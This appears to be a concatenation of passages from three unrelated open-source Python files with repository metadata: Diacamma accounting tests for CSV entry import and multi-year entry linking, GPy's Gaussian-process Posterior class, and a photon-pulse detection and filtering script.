05/09/2015;512;Virement ;1234.56 EUR;;;;#ABC987654
05/09/2015;411;Virement ;;1234.56 EUR;Minimum;;
06/09/2015;701;Sell;;321.47;;open;
06/09/2015;706;Sell;;366,51;;;
06/09/2015;411;Sell;687,98;;Dalton Joe;;
07/09/2015;512;Bad sum;123;;;;
07/09/2015;531;Bad sum;;456;;;
08/09/2015;515;Bad code;20,00;;;;
08/09/2015;531;Bad code;;20,00;;;
09/09/2015;106;alone;99999.99;;;;
10/09/2015;601;Wrong buy;30.02;;;bad;
10/09/2015;602;Wrong buy;37.01;;;close;
10/09/2015;401;Wrong buy;;67.03;Valjean Jean;;
11/09/2016;512;Bad date;500,00;;;;
11/09/2016;531;Bad date;;500,00;;;
"""
self.factory.xfer = EntryAccountImport()
self.calljson('/diacamma.accounting/entryAccountImport', {'step': 1, 'year': 1, 'journal': 5, 'quotechar': "'",
'delimiter': ';', 'encoding': 'utf-8', 'dateformat': '%d/%m/%Y', 'csvcontent': StringIO(csv_content)}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountImport')
self.assert_count_equal('', 15)
self.assert_json_equal('LABELFORM', 'year', 'Exercice du 1 janvier 2015 au 31 décembre 2015 [en création]')
self.assert_json_equal('LABELFORM', 'journal', 'Opérations diverses')
self.assert_select_equal('fld_entry.date_value', 8)
self.assert_select_equal('fld_entry.designation', 8)
self.assert_select_equal('fld_account', 8)
self.assert_select_equal('fld_debit', 8)
self.assert_select_equal('fld_credit', 8)
self.assert_select_equal('fld_third', 9)
self.assert_select_equal('fld_reference', 9)
self.assert_select_equal('fld_costaccounting', 9)
self.assert_count_equal('CSV', 17)
self.assert_count_equal('#CSV/actions', 0)
self.factory.xfer = EntryAccountImport()
self.calljson('/diacamma.accounting/entryAccountImport', {'step': 2, 'year': 1, 'journal': 5, 'quotechar': "'", 'delimiter': ';',
'encoding': 'utf-8', 'dateformat': '%d/%m/%Y', 'csvcontent0': csv_content,
"fld_entry.date_value": "date", "fld_entry.designation": "description", "fld_account": "code",
'fld_debit': 'debit', 'fld_credit': 'credit', 'fld_third': 'third',
'fld_reference': 'ref', 'fld_costaccounting': 'cost'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountImport')
self.assert_count_equal('', 5)
self.assert_count_equal('CSV', 17)
self.assert_count_equal('#CSV/actions', 0)
self.factory.xfer = EntryAccountImport()
self.calljson('/diacamma.accounting/entryAccountImport', {'step': 3, 'year': 1, 'journal': 5, 'quotechar': "'", 'delimiter': ';',
'encoding': 'utf-8', 'dateformat': '%d/%m/%Y', 'csvcontent0': csv_content,
"fld_entry.date_value": "date", "fld_entry.designation": "description", "fld_account": "code",
'fld_debit': 'debit', 'fld_credit': 'credit', 'fld_third': 'third',
'fld_reference': 'ref', 'fld_costaccounting': 'cost'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountImport')
self.assert_count_equal('', 4)
self.assert_json_equal('LABELFORM', 'result', "4 éléments ont été importés")
self.assert_json_equal('LABELFORM', 'import_error', ["Écriture comptable non équilibré{[br/]}total crédit=333,00\xa0€ - total débit=0,00\xa0€",
'Code comptable "515" inconnu !',
"L'écriture 'Bad code' n'a qu'une seule ligne.",
"L'écriture 'alone' n'a qu'une seule ligne.",
"Comptabilité analytique 'bad' inconnue !",
"Comptabilité analytique 'close' inconnue !",
"Tiers 'Valjean Jean' inconnu !",
"Date '2015-12-31' invalide !"])
self.assert_count_equal('entryline', 10)
self.assert_json_equal('', 'entryline/@0/entry.num', None)
self.assert_json_equal('', 'entryline/@0/link', None)
self.assert_json_equal('', 'entryline/@0/entry.date_value', '2015-09-04')
self.assert_json_equal('', 'entryline/@0/designation_ref', 'Retrait')
self.assert_json_equal('', 'entryline/@0/entry_account', '[512] 512')
self.assert_json_equal('', 'entryline/@0/costaccounting', None)
self.assert_json_equal('', 'entryline/@0/debit', -1000.00)
self.assert_json_equal('', 'entryline/@1/entry_account', '[531] 531')
self.assert_json_equal('', 'entryline/@1/costaccounting', None)
self.assert_json_equal('', 'entryline/@1/credit', 1000.00)
self.assert_json_equal('', 'entryline/@2/entry.date_value', '2015-09-05')
self.assert_json_equal('', 'entryline/@2/designation_ref', 'Virement')
self.assert_json_equal('', 'entryline/@2/entry_account', '[411 Minimum]')
self.assert_json_equal('', 'entryline/@2/costaccounting', None)
self.assert_json_equal('', 'entryline/@2/credit', 1234.56)
self.assert_json_equal('', 'entryline/@3/designation_ref', 'Virement{[br/]}#ABC987654')
self.assert_json_equal('', 'entryline/@3/entry_account', '[512] 512')
self.assert_json_equal('', 'entryline/@3/costaccounting', None)
self.assert_json_equal('', 'entryline/@3/debit', -1234.56)
self.assert_json_equal('', 'entryline/@4/entry.date_value', '2015-09-06')
self.assert_json_equal('', 'entryline/@4/designation_ref', 'Sell')
self.assert_json_equal('', 'entryline/@4/entry_account', '[411 Dalton Joe]')
self.assert_json_equal('', 'entryline/@4/costaccounting', None)
self.assert_json_equal('', 'entryline/@4/debit', -687.98)
self.assert_json_equal('', 'entryline/@5/entry_account', '[701] 701')
self.assert_json_equal('', 'entryline/@5/costaccounting', 'open')
self.assert_json_equal('', 'entryline/@5/credit', 321.47)
self.assert_json_equal('', 'entryline/@6/entry_account', '[706] 706')
self.assert_json_equal('', 'entryline/@6/costaccounting', None)
self.assert_json_equal('', 'entryline/@6/credit', 366.51)
self.assert_json_equal('', 'entryline/@7/entry.date_value', '2015-09-10')
self.assert_json_equal('', 'entryline/@7/designation_ref', 'Wrong buy')
self.assert_json_equal('', 'entryline/@7/entry_account', '[401] 401')
self.assert_json_equal('', 'entryline/@7/costaccounting', None)
self.assert_json_equal('', 'entryline/@7/credit', 67.03)
self.assert_json_equal('', 'entryline/@8/entry_account', '[601] 601')
self.assert_json_equal('', 'entryline/@8/costaccounting', None)
self.assert_json_equal('', 'entryline/@8/debit', -30.02)
self.assert_json_equal('', 'entryline/@9/entry_account', '[602] 602')
self.assert_json_equal('', 'entryline/@9/costaccounting', None)
self.assert_json_equal('', 'entryline/@9/debit', -37.01)
def test_link_entries_multiyear(self):
# data last year
self.factory.xfer = FiscalYearBegin()
self.calljson('/diacamma.accounting/fiscalYearBegin', {'CONFIRME': 'YES', 'year': '1', 'type_of_account': '-1'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'fiscalYearBegin')
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'SAVE': 'YES', 'year': '1', 'journal': '2',
'date_value': '2015-12-27', 'designation': 'Une belle facture'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountEdit')
self.factory.xfer = EntryAccountValidate()
self.calljson('/diacamma.accounting/entryAccountValidate', {'year': '1', 'journal': '2', 'entryaccount': '1',
'serial_entry': "-6|9|0|364.91|0|0|None|\n-7|1|5|364.91|0|0|None|"}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountValidate')
self.factory.xfer = EntryAccountClose()
self.calljson('/diacamma.accounting/entryAccountClose',
{'CONFIRME': 'YES', 'year': '1', 'journal': '2', "entryline": "1"}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountClose')
# data new year
new_year = FiscalYear.objects.create(begin='2016-01-01', end='2016-12-31', status=0, last_fiscalyear_id=1)
fill_accounts_fr(new_year)
self.factory.xfer = ChartsAccountList()
self.calljson('/diacamma.accounting/chartsAccountList', {'year': '2', 'type_of_account': '-1'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'chartsAccountList')
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'SAVE': 'YES', 'year': '2', 'journal': '4', 'date_value': '2016-01-03',
'designation': 'Règlement de belle facture'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountEdit')
self.factory.xfer = EntryAccountValidate()
self.calljson('/diacamma.accounting/entryAccountValidate', {'year': '2', 'journal': '4', 'entryaccount': '2',
'serial_entry': "-9|18|5|-364.91|0|0|None|\n-8|19|0|364.91|0|0|BP N°987654|"}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountValidate')
self.factory.xfer = EntryAccountClose()
self.calljson('/diacamma.accounting/entryAccountClose',
{'CONFIRME': 'YES', 'year': '2', 'journal': '4', "entryline": "4"}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountClose')
# begin test
self.factory.xfer = ThirdShow()
self.calljson('/diacamma.accounting/thirdShow', {"third": 5, 'lines_filter': 2}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'thirdShow')
self.assert_count_equal('entryline', 2)
self.assert_json_equal('', 'entryline/@0/id', '2')
self.assert_json_equal('', 'entryline/@0/entry.num', 1)
self.assert_json_equal('', 'entryline/@0/entry.date_value', '2015-12-27')
self.assert_json_equal('', 'entryline/@0/link', None)
self.assert_json_equal('', 'entryline/@0/entry_account', '[411 Dalton William]')
self.assert_json_equal('', 'entryline/@0/designation_ref', 'Une belle facture')
self.assert_json_equal('', 'entryline/@0/debit', -364.91)
self.assert_json_equal('', 'entryline/@0/costaccounting', None)
self.assert_json_equal('', 'entryline/@1/id', '3')
self.assert_json_equal('', 'entryline/@1/entry.num', 1)
self.assert_json_equal('', 'entryline/@1/entry.date_value', '2016-01-03')
self.assert_json_equal('', 'entryline/@1/link', None)
self.assert_json_equal('', 'entryline/@1/entry_account', '[411 Dalton William]')
self.assert_json_equal('', 'entryline/@1/designation_ref', 'Règlement de belle facture')
self.assert_json_equal('', 'entryline/@1/credit', 364.91)
self.assert_json_equal('', 'entryline/@1/costaccounting', None)
self.factory.xfer = EntryAccountLink()
self.calljson('/diacamma.accounting/entryAccountLink', {'entryline': '2;3'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountLink')
self.factory.xfer = ThirdShow()
self.calljson('/diacamma.accounting/thirdShow', {"third": 5, 'lines_filter': 2}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'thirdShow')
self.assert_count_equal('entryline', 2)
self.assert_json_equal('', 'entryline/@0/id', '2')
self.assert_json_equal('', 'entryline/@0/entry.num', 1)
self.assert_json_equal('', 'entryline/@0/entry.date_value', '2015-12-27')
self.assert_json_equal('', 'entryline/@0/link', "A&")
self.assert_json_equal('', 'entryline/@0/entry_account', '[411 Dalton William]')
self.assert_json_equal('', 'entryline/@0/designation_ref', 'Une belle facture')
self.assert_json_equal('', 'entryline/@0/debit', -364.91)
self.assert_json_equal('', 'entryline/@0/costaccounting', None)
self.assert_json_equal('', 'entryline/@1/id', '3')
self.assert_json_equal('', 'entryline/@1/entry.num', 1)
self.assert_json_equal('', 'entryline/@1/entry.date_value', '2016-01-03')
self.assert_json_equal('', 'entryline/@1/link', "A&")
self.assert_json_equal('', 'entryline/@1/entry_account', '[411 Dalton William]')
self.assert_json_equal('', 'entryline/@1/designation_ref', 'Règlement de belle facture')
self.assert_json_equal('', 'entryline/@1/credit', 364.91)
self.assert_json_equal('', 'entryline/@1/costaccounting', None)
self.factory.xfer = FiscalYearClose()
self.calljson('/diacamma.accounting/fiscalYearClose', {'CONFIRME': 'YES', 'year': '1', 'type_of_account': '-1'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'fiscalYearClose')
self.factory.xfer = ThirdShow()
self.calljson('/diacamma.accounting/thirdShow', {"third": 5, 'lines_filter': 2}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'thirdShow')
self.assert_count_equal('entryline', 3)
self.assert_json_equal('', 'entryline/@0/id', '2')
self.assert_json_equal('', 'entryline/@0/entry.num', 1)
self.assert_json_equal('', 'entryline/@0/entry.date_value', '2015-12-27')
self.assert_json_equal('', 'entryline/@0/link', "A")
self.assert_json_equal('', 'entryline/@0/entry_account', '[411 Dalton William]')
self.assert_json_equal('', 'entryline/@0/designation_ref', 'Une belle facture')
self.assert_json_equal('', 'entryline/@0/debit', -364.91)
self.assert_json_equal('', 'entryline/@0/costaccounting', None)
self.assert_json_equal('', 'entryline/@1/id', '7')
self.assert_json_equal('', 'entryline/@1/entry.num', 3)
self.assert_json_equal('', 'entryline/@1/entry.date_value', '2015-12-31')
self.assert_json_equal('', 'entryline/@1/link', "A")
self.assert_json_equal('', 'entryline/@1/entry_account', '[411 Dalton William]')
self.assert_json_equal('', 'entryline/@1/designation_ref', "Cloture d'exercice - Tiers{[br/]}Une belle facture")
self.assert_json_equal('', 'entryline/@1/credit', 364.91)
self.assert_json_equal('', 'entryline/@1/costaccounting', None)
self.assert_json_equal('', 'entryline/@2/id', '3')
self.assert_json_equal('', 'entryline/@2/entry.num', 1)
self.assert_json_equal('', 'entryline/@2/entry.date_value', '2016-01-03')
self.assert_json_equal('', 'entryline/@2/link', None)
self.assert_json_equal('', 'entryline/@2/entry_account', '[411 Dalton William]')
self.assert_json_equal('', 'entryline/@2/designation_ref', 'Règlement de belle facture')
self.assert_json_equal('', 'entryline/@2/credit', 364.91)
self.assert_json_equal('', 'entryline/@2/costaccounting', None)
self.factory.xfer = FiscalYearReportLastYear()
self.calljson('/diacamma.accounting/fiscalYearReportLastYear', {'CONFIRME': 'YES', 'year': '2', 'type_of_account': '-1'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'fiscalYearReportLastYear')
self.factory.xfer = ThirdShow()
self.calljson('/diacamma.accounting/thirdShow', {"third": 5, 'lines_filter': 2}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'thirdShow')
self.assert_count_equal('entryline', 4)
self.assert_json_equal('', 'entryline/@0/id', '2')
self.assert_json_equal('', 'entryline/@0/entry.num', 1)
self.assert_json_equal('', 'entryline/@0/entry.date_value', '2015-12-27')
self.assert_json_equal('', 'entryline/@0/link', "A")
self.assert_json_equal('', 'entryline/@0/entry_account', '[411 Dalton William]')
self.assert_json_equal('', 'entryline/@0/designation_ref', 'Une belle facture')
self.assert_json_equal('', 'entryline/@0/debit', -364.91)
self.assert_json_equal('', 'entryline/@0/costaccounting', None)
self.assert_json_equal('', 'entryline/@1/id', '7')
self.assert_json_equal('', 'entryline/@1/entry.num', 3)
self.assert_json_equal('', 'entryline/@1/entry.date_value', '2015-12-31')
self.assert_json_equal('', 'entryline/@1/link', "A")
self.assert_json_equal('', 'entryline/@1/entry_account', '[411 Dalton William]')
self.assert_json_equal('', 'entryline/@1/designation_ref', "Cloture d'exercice - Tiers{[br/]}Une belle facture")
self.assert_json_equal('', 'entryline/@1/credit', 364.91)
self.assert_json_equal('', 'entryline/@1/costaccounting', None)
self.assert_json_equal('', 'entryline/@2/id', '12')
self.assert_json_equal('', 'entryline/@2/entry.num', 3)
self.assert_json_equal('', 'entryline/@2/entry.date_value', '2016-01-01')
self.assert_json_equal('', 'entryline/@2/link', "A")
self.assert_json_equal('', 'entryline/@2/entry_account', '[411 Dalton William]')
self.assert_json_equal('', 'entryline/@2/designation_ref', 'Report à nouveau - Dette tiers{[br/]}Une belle facture')
self.assert_json_equal('', 'entryline/@2/debit', -364.91)
self.assert_json_equal('', 'entryline/@2/costaccounting', None)
self.assert_json_equal('', 'entryline/@3/id', '3')
self.assert_json_equal('', 'entryline/@3/entry.num', 1)
self.assert_json_equal('', 'entryline/@3/entry.date_value', '2016-01-03')
self.assert_json_equal('', 'entryline/@3/link', "A")
self.assert_json_equal('', 'entryline/@3/entry_account', '[411 Dalton William]')
self.assert_json_equal('', 'entryline/@3/designation_ref', 'Règlement de belle facture')
self.assert_json_equal('', 'entryline/@3/credit', 364.91)
self.assert_json_equal('', 'entryline/@3/costaccounting', None)
|
Diacamma2/financial
|
diacamma/accounting/tests_entries.py
|
Python
|
gpl-3.0
| 87,704
|
[
"Dalton"
] |
318c1de3e128ee05a30abaa16e57ddda414e66c632a81b54f18dba011b3da324
|
# Copyright (c) 2012, GPy authors (see AUTHORS.txt).
# Licensed under the BSD 3-clause license (see LICENSE.txt)
import numpy as np
from ...util.linalg import pdinv, dpotrs, dpotri, symmetrify, jitchol, dtrtrs, tdot
from GPy.core.parameterization.variational import VariationalPosterior
class Posterior(object):
"""
An object to represent a Gaussian posterior over latent function values, p(f|D).
This may be computed exactly for Gaussian likelihoods, or approximated for
non-Gaussian likelihoods.
The purpose of this class is to serve as an interface between the inference
schemes and the model classes. the model class can make predictions for
the function at any new point x_* by integrating over this posterior.
"""
def __init__(self, woodbury_chol=None, woodbury_vector=None, K=None, mean=None, cov=None, K_chol=None, woodbury_inv=None, prior_mean=0):
"""
woodbury_chol : a lower triangular matrix L that satisfies posterior_covariance = K - K L^{-T} L^{-1} K
woodbury_vector : a matrix (or vector, as Nx1 matrix) M which satisfies posterior_mean = K M
K : the proir covariance (required for lazy computation of various quantities)
mean : the posterior mean
cov : the posterior covariance
Not all of the above need to be supplied! You *must* supply:
K (for lazy computation)
or
K_chol (for lazy computation)
You may supply either:
woodbury_chol
woodbury_vector
Or:
mean
cov
Of course, you can supply more than that, but this class will lazily
compute all other quantites on demand.
"""
#obligatory
self._K = K
if ((woodbury_chol is not None) and (woodbury_vector is not None))\
or ((woodbury_inv is not None) and (woodbury_vector is not None))\
or ((woodbury_inv is not None) and (mean is not None))\
or ((mean is not None) and (cov is not None)):
pass # we have sufficient to compute the posterior
else:
raise ValueError("insufficient information to compute the posterior")
self._K_chol = K_chol
self._K = K
#option 1:
self._woodbury_chol = woodbury_chol
self._woodbury_vector = woodbury_vector
#option 2.
self._woodbury_inv = woodbury_inv
#and woodbury vector
#option 2:
self._mean = mean
self._covariance = cov
self._prior_mean = prior_mean
#compute this lazily
self._precision = None
@property
def mean(self):
"""
Posterior mean
$$
K_{xx}v
v := \texttt{Woodbury vector}
$$
"""
if self._mean is None:
self._mean = np.dot(self._K, self.woodbury_vector)
return self._mean
@property
def covariance(self):
"""
Posterior covariance
$$
K_{xx} - K_{xx}W_{xx}^{-1}K_{xx}
W_{xx} := \texttt{Woodbury inv}
$$
"""
if self._covariance is None:
#LiK, _ = dtrtrs(self.woodbury_chol, self._K, lower=1)
self._covariance = (np.atleast_3d(self._K) - np.tensordot(np.dot(np.atleast_3d(self.woodbury_inv).T, self._K), self._K, [1,0]).T).squeeze()
#self._covariance = self._K - self._K.dot(self.woodbury_inv).dot(self._K)
return self._covariance
@property
def precision(self):
"""
Inverse of posterior covariance
"""
if self._precision is None:
cov = np.atleast_3d(self.covariance)
self._precision = np.zeros(cov.shape) # if one covariance per dimension
for p in range(cov.shape[-1]):
self._precision[:,:,p] = pdinv(cov[:,:,p])[0]
return self._precision
@property
def woodbury_chol(self):
"""
return $L_{W}$ where L is the lower triangular Cholesky decomposition of the Woodbury matrix
$$
L_{W}L_{W}^{\top} = W^{-1}
W^{-1} := \texttt{Woodbury inv}
$$
"""
if self._woodbury_chol is None:
#compute woodbury chol from
if self._woodbury_inv is not None:
winv = np.atleast_3d(self._woodbury_inv)
self._woodbury_chol = np.zeros(winv.shape)
for p in range(winv.shape[-1]):
self._woodbury_chol[:,:,p] = pdinv(winv[:,:,p])[2]
#Li = jitchol(self._woodbury_inv)
#self._woodbury_chol, _ = dtrtri(Li)
#W, _, _, _, = pdinv(self._woodbury_inv)
#symmetrify(W)
#self._woodbury_chol = jitchol(W)
#try computing woodbury chol from cov
elif self._covariance is not None:
raise NotImplementedError("TODO: check code here")
B = self._K - self._covariance
tmp, _ = dpotrs(self.K_chol, B)
self._woodbury_inv, _ = dpotrs(self.K_chol, tmp.T)
_, _, self._woodbury_chol, _ = pdinv(self._woodbury_inv)
else:
raise ValueError("insufficient information to compute posterior")
return self._woodbury_chol
@property
def woodbury_inv(self):
"""
The inverse of the woodbury matrix, in the gaussian likelihood case it is defined as
$$
(K_{xx} + \Sigma_{xx})^{-1}
\Sigma_{xx} := \texttt{Likelihood.variance / Approximate likelihood covariance}
$$
"""
if self._woodbury_inv is None:
if self._woodbury_chol is not None:
self._woodbury_inv, _ = dpotri(self._woodbury_chol, lower=1)
#self._woodbury_inv, _ = dpotrs(self.woodbury_chol, np.eye(self.woodbury_chol.shape[0]), lower=1)
symmetrify(self._woodbury_inv)
elif self._covariance is not None:
B = np.atleast_3d(self._K) - np.atleast_3d(self._covariance)
self._woodbury_inv = np.empty_like(B)
for i in range(B.shape[-1]):
tmp, _ = dpotrs(self.K_chol, B[:,:,i])
self._woodbury_inv[:,:,i], _ = dpotrs(self.K_chol, tmp.T)
return self._woodbury_inv
@property
def woodbury_vector(self):
"""
Woodbury vector in the gaussian likelihood case only is defined as
$$
(K_{xx} + \Sigma)^{-1}Y
\Sigma := \texttt{Likelihood.variance / Approximate likelihood covariance}
$$
"""
if self._woodbury_vector is None:
self._woodbury_vector, _ = dpotrs(self.K_chol, self.mean - self._prior_mean)
return self._woodbury_vector
@property
def K_chol(self):
"""
Cholesky of the prior covariance K
"""
if self._K_chol is None:
self._K_chol = jitchol(self._K)
return self._K_chol
def _raw_predict(self, kern, Xnew, pred_var, full_cov=False):
woodbury_vector = self.woodbury_vector
woodbury_inv = self.woodbury_inv
if not isinstance(Xnew, VariationalPosterior):
Kx = kern.K(pred_var, Xnew)
mu = np.dot(Kx.T, woodbury_vector)
if len(mu.shape)==1:
mu = mu.reshape(-1,1)
if full_cov:
Kxx = kern.K(Xnew)
if woodbury_inv.ndim == 2:
var = Kxx - np.dot(Kx.T, np.dot(woodbury_inv, Kx))
elif woodbury_inv.ndim == 3: # Missing data
var = np.empty((Kxx.shape[0],Kxx.shape[1],woodbury_inv.shape[2]))
from ...util.linalg import mdot
for i in range(var.shape[2]):
var[:, :, i] = (Kxx - mdot(Kx.T, woodbury_inv[:, :, i], Kx))
var = var
else:
Kxx = kern.Kdiag(Xnew)
if woodbury_inv.ndim == 2:
var = (Kxx - np.sum(np.dot(woodbury_inv.T, Kx) * Kx, 0))[:,None]
elif woodbury_inv.ndim == 3: # Missing data
var = np.empty((Kxx.shape[0],woodbury_inv.shape[2]))
for i in range(var.shape[1]):
var[:, i] = (Kxx - (np.sum(np.dot(woodbury_inv[:, :, i].T, Kx) * Kx, 0)))
var = var
else:
psi0_star = kern.psi0(pred_var, Xnew)
psi1_star = kern.psi1(pred_var, Xnew)
psi2_star = kern.psi2n(pred_var, Xnew)
la = woodbury_vector
mu = np.dot(psi1_star, la) # TODO: dimensions?
N,M,D = psi0_star.shape[0],psi1_star.shape[1], la.shape[1]
if full_cov:
raise NotImplementedError("Full covariance for Sparse GP predicted with uncertain inputs not implemented yet.")
var = np.zeros((Xnew.shape[0], la.shape[1], la.shape[1]))
di = np.diag_indices(la.shape[1])
else:
tmp = psi2_star - psi1_star[:,:,None]*psi1_star[:,None,:]
var = (tmp.reshape(-1,M).dot(la).reshape(N,M,D)*la[None,:,:]).sum(1) + psi0_star[:,None]
if woodbury_inv.ndim==2:
var += -psi2_star.reshape(N,-1).dot(woodbury_inv.flat)[:,None]
else:
var += -psi2_star.reshape(N,-1).dot(woodbury_inv.reshape(-1,D))
var = np.clip(var,1e-15,np.inf)
return mu, var
class PosteriorExact(Posterior):
def _raw_predict(self, kern, Xnew, pred_var, full_cov=False):
Kx = kern.K(pred_var, Xnew)
mu = np.dot(Kx.T, self.woodbury_vector)
if len(mu.shape)==1:
mu = mu.reshape(-1,1)
if full_cov:
Kxx = kern.K(Xnew)
if self._woodbury_chol.ndim == 2:
tmp = dtrtrs(self._woodbury_chol, Kx)[0]
var = Kxx - tdot(tmp.T)
elif self._woodbury_chol.ndim == 3: # Missing data
var = np.empty((Kxx.shape[0],Kxx.shape[1],self._woodbury_chol.shape[2]))
for i in range(var.shape[2]):
tmp = dtrtrs(self._woodbury_chol[:,:,i], Kx)[0]
var[:, :, i] = (Kxx - tdot(tmp.T))
var = var
else:
Kxx = kern.Kdiag(Xnew)
if self._woodbury_chol.ndim == 2:
tmp = dtrtrs(self._woodbury_chol, Kx)[0]
var = (Kxx - np.square(tmp).sum(0))[:,None]
elif self._woodbury_chol.ndim == 3: # Missing data
var = np.empty((Kxx.shape[0],self._woodbury_chol.shape[2]))
for i in range(var.shape[1]):
tmp = dtrtrs(self._woodbury_chol[:,:,i], Kx)[0]
var[:, i] = (Kxx - np.square(tmp).sum(0))
var = var
return mu, var
|
avehtari/GPy
|
GPy/inference/latent_function_inference/posterior.py
|
Python
|
bsd-3-clause
| 10,849
|
[
"Gaussian"
] |
43e7b14b2bd67af2124f83bdbba7cc8acf573601534d6c8bdaea23c36fe59ecf
|
from matplotlib import rcParams, rc
import numpy as np
import sys
from fitFunctions import gaussian
import scipy.interpolate
import scipy.signal
from baselineIIR import IirFilter
import pickle
# common setup for matplotlib
params = {'savefig.dpi': 300, # save figures to 300 dpi
'axes.labelsize': 14,
'text.fontsize': 14,
'legend.fontsize': 14,
'xtick.labelsize': 14,
'ytick.major.pad': 6,
'xtick.major.pad': 6,
'ytick.labelsize': 14}
# use of Sans Serif also in math mode
rc('text.latex', preamble='\usepackage{sfmath}')
rcParams.update(params)
import matplotlib.pyplot as plt
import numpy as np
import os
import struct
def calcThreshold(phase,nSigma=2.5,nSamples=5000):
n,bins= np.histogram(phase[:nSamples],bins=100)
n = np.array(n,dtype='float32')/np.sum(n)
tot = np.zeros(len(bins))
for i in xrange(len(bins)):
tot[i] = np.sum(n[:i])
med = bins[np.abs(tot-0.5).argmin()]
thresh = bins[np.abs(tot-0.05).argmin()]
threshold = med-nSigma*abs(med-thresh)
return threshold
def velocityTrigger(data,nSigmaTrig=5.,deadtime=10,bNegativePulses=True):
#deadtime in ticks (us)
if bNegativePulses:
data = -np.array(data) #flip to be positve pulses
else:
data = np.array(data)
derivative = np.diff(data)
med = np.median(derivative)
sdev = np.std(derivative)
trigMask = data > (med + sdev*nSigmaTrig)
if np.sum(trigMask) > 0:
peakIndices = np.where(trigMask)[0] #we want the point after the high derivative
i = 0
p = peakIndices[i]
while p < peakIndices[-1]:
peakIndices = peakIndices[np.logical_or(peakIndices-p > deadtime , peakIndices-p <= 0)]#apply deadtime
i+=1
if i < len(peakIndices):
p = peakIndices[i]
else:
p = peakIndices[-1]
else:
return {'peakIndices':np.array([]),'peakHeights':np.array([])}
if bNegativePulses:
peakHeights = -data[peakIndices] #flip back to negative pulses
else:
peakHeights = data[peakIndices]
return {'peakIndices':peakIndices,'peakHeights':peakHeights}
def sigmaTrigger(data,nSigmaTrig=7.,deadtime=10):
#deadtime in ticks (us)
data = np.array(data)
med = np.median(data)
trigMask = data > (med + np.std(data)*nSigmaTrig)
if np.sum(trigMask) > 0:
peakIndices = np.where(trigMask)[0]
i = 0
p = peakIndices[i]
while p < peakIndices[-1]:
peakIndices = peakIndices[np.logical_or(peakIndices-p > deadtime , peakIndices-p <= 0)]#apply deadtime
i+=1
if i < len(peakIndices):
p = peakIndices[i]
else:
p = peakIndices[-1]
else:
return {'peakIndices':np.array([]),'peakHeights':np.array([])}
peakHeights = data[peakIndices]
return {'peakIndices':peakIndices,'peakHeights':peakHeights}
def detectPulses(data,threshold=None,nSigmaThreshold=None,deadtime=10,nNegDerivChecks=10,negDerivLenience=1,bNegativePulses = True):
#deadtime in ticks (us)
if bNegativePulses:
data = np.array(data)
else:
data = -np.array(data) #flip to negative pulses
if threshold is None:
threshold = calcThreshold(data,nSigma=nSigmaThreshold)
derivative = np.diff(data)
peakHeights = []
t = 0
negDeriv = derivative <= 0
posDeriv = np.logical_not(negDeriv)
triggerBooleans = data[nNegDerivChecks:-2] < threshold
negDerivChecksSum = np.zeros(len(negDeriv[0:-nNegDerivChecks-1]))
for i in range(nNegDerivChecks):
negDerivChecksSum += negDeriv[i:i-nNegDerivChecks-1]
peakCondition0 = negDerivChecksSum >= nNegDerivChecks-negDerivLenience
peakCondition1 = np.logical_and(posDeriv[nNegDerivChecks:-1],posDeriv[nNegDerivChecks+1:])
peakCondition01 = np.logical_and(peakCondition0,peakCondition1)
peakBooleans = np.logical_and(triggerBooleans,peakCondition01)
try:
peakIndices = np.where(peakBooleans)[0]+nNegDerivChecks
i = 0
p = peakIndices[i]
while p < peakIndices[-1]:
peakIndices = peakIndices[np.logical_or(peakIndices-p > deadtime , peakIndices-p <= 0)]#apply deadtime
i+=1
if i < len(peakIndices):
p = peakIndices[i]
else:
p = peakIndices[-1]
except IndexError:
return {'peakIndices':np.array([]),'peakHeights':np.array([])}
if bNegativePulses:
peakHeights = data[peakIndices]
else:
peakHeights = -data[peakIndices] #flip back to positive sign
return {'peakIndices':peakIndices,'peakHeights':peakHeights}
if __name__=='__main__':
#identify which pixel and files we want
# roachNum = 4
# pixelNum = 102
# secs=50
# date = '20121204'
# label='30tap_slowBase'
roachNum = 0
pixelNum = 0
date = '20160301'
label='sim_high'
subBaseLabel = 'SubBase'
rootFolder = '/Scratch/filterData/'
cps=200 #I don't really know. let's check
folder = os.path.join(rootFolder,date)
bFiltered = False
#np.savez('/Scratch/dataProcessing/filterTests/filteredData_{}_r{}p{}_{}.npz'.format(date,roachNum,pixelNum,label),rawdata=rawdata,wienerFilterCoeffs=wienerFilterCoeffs,template=template,noiseSpectrum=noiseSpectrum,templateFilteredData=templateFilteredData,wienerFilteredData=wienerFilteredData)
filteredDict = np.load('/Scratch/dataProcessing/filterTests/filteredData{}_{}_r{}p{}_{}.npz'.format(subBaseLabel,date,roachNum,pixelNum,label))
filterTypes = ['unity','template','matched','super matched','wiener']
filteredDataKeys = ['rawdata','templateFilteredData','matchedFilteredData','superMatchedFilteredData','wienerFilteredData']
filterColors = ['gray','black','blue','cyan','red']
bSubtractBaselines = False
if bSubtractBaselines:
#create a highpass filter, then apply it to the data to take out the low frequency baseline
sampleRate=1e6 # samples per second
criticalFreq = 20 #Hz
f=2*np.sin(np.pi*criticalFreq/sampleRate)
Q=.7
q=1./Q
